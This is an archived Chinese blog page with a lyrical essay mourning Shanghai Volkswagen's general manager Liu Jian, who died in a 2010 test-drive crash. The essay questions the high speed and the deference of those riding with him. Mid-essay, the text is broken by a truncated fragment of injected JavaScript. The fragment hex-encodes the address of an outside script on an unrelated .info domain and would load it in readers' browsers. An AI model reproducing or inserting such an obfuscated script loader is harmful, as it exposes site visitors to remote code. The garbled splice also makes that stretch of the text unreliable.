注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

谦谦的博客

——沉思是一种美丽

 
 
 

日志

 
 

原创:《你!》  

2010-07-20 10:46:31|  分类: 散文随笔 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

        7月17日,在甘肃酒泉举行的经销商访谈和试乘试驾活动中,发生一起意外交通事故,上海大众总经理刘坚等四人不幸遇难。

       刘坚,从2007年至今任上海大众总经理。1964年9月出生,高级工程师,硕士学位。1986年7月毕业于上海同济大学电气工程系工业自动化专业,同年在上海大众汽车有限公司参加工作。从1986年到2001年在上海大众的产品工程部试验科、电器科历任工程师、股长、经理。

   image  

        

        你去了,你匆匆去了天国。我不是你的亲人,我不是你的朋友,我不是你的下属。但我诚心地、诚心地,愿你一路走好!

 多么痛惜你的风华正茂,多么痛惜你正如大鹏展翅,多么痛惜你满腹经纶,扼腕长叹你以身殉职,你为何走得竟如此匆忙!

 在商海你是咤咤风云的英雄!上海大众自你上任以来,历年力压同行,屡屡登上销量冠军的宝座,是不是依仗你的身体力行?

 订货会上,你一心要展示新车的优异功能!车速达到每小时220公里!你是不是得意忘形地把车当成了飞机?只恨自己飞不高?同行的人是不是曾提心吊胆?却不敢声张?也许是出于对你的信任,他们才不发声响?你是否对如风的车速,产生过几丝死的畏惧?是不是深以为耻,才让情绪隐藏心底?你是不是心存几分侥幸?是不是你的眼中,只有胜利之花昂首怒放?

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D">你带上了出口成章的公关总监,是不是寄希望凯旋归来时,期待他因经历过驰骋风云间的实际感受,面对媒体能妙语如珠、进而妙笔生花?这款名叫“途观”的越野车,是不是凝聚了你太多的心血?是不是被你寄予了太多的厚望?是不是你把它当成又一个制高点?是不是你想争取更多的订单?是不是你想创造另一个辉煌?

也许你什么都思虑周全,唯独没想到死亡!也许你想到了,却豁达从容,只因你相信身先士卒的力量!你只是豪情万丈!你一如既往,你只是要做就做最好!你即是指挥员,又是亲赴阵地作战的勇士!你抿抿嘴角,沉着吐出一口气,仿佛兴邦安国的举措,就决定在你唇齿之间!你毅然决然地下达了出征的命令!车象离弦的箭,勇往直前!我不相信你没有感知死亡的阴影!极速地飚车路途中,你应该不止看到路旁的绿树鲜花,也应看到死神在阴影里徘徊!不知何时,它就无声无息上了车,把握着方向,暗暗地和你的司机较量。最终,风萧萧兮易水寒,壮士一去兮不回还!

人世间,为什么有这么多遗憾?如果附近就有试验用的飚车道;如果路途中真有人理智提醒,如果人没有从众心理;如果人没有看眼色行事的奴性;如果你真闪过让车慢下来的念头,并改变了车速;又或许对面,没有那辆土方车泰山般驰来,那车祸就不会发生,那将是圆满的结局,那一切该是多么美妙!

然而,现实却无情!撞击后的爆炸声响,震痛了人们的心脏!许多人关切地问:家属还好吗?真不忍听人们叫“途观”为“途棺(屠棺)”!

 眼睁睁把一切全抛,壮志未酬身先卒,你心甘吗?与你同行的三人,白白陪你丢了性命。纵然你是英雄,你的灵魂能安息吗?你的肩上有着那么多难以推诿的责任,左也难右也难。你也许在奈何桥上踌躇不前,直到喝下能忘三世的孟婆汤,怕也还是长使英雄泪满巾吧?

 

  评论这张
 
阅读(261)| 评论(25)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017